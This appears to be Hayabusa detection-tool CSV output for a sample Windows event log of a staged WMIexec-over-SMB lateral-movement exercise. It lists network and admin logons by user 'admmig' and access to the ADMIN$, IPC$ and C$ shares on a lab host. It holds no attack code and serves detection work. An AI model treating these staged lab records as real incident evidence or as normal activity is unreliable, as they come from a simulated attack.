+09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : 
Port: 50896 : LogonID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 56740 : LogonID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 44948 : LogonID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 44948 : LogonID: 
0x189fa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 44948 : LogonID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: 
\??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.515 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 
127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 
63564 : LogonID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 
0x18ad10,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63565 : LogonID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63566 : LogonID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63567 : LogonID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:27.649 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63564 : LogonID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Program Files\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.306 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\DesktopTileResources\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.321 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Downloaded Program Files\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Fonts\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ImmersiveControlPanel\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\media\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.352 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Offline Web Pages\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ToastData\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ar : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\bg : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\cs : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\da : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\de : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\el : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\en : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\es : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\et : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\fi : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\fr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\he : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\hr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\hu : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\it : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ja : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ko : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\lt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
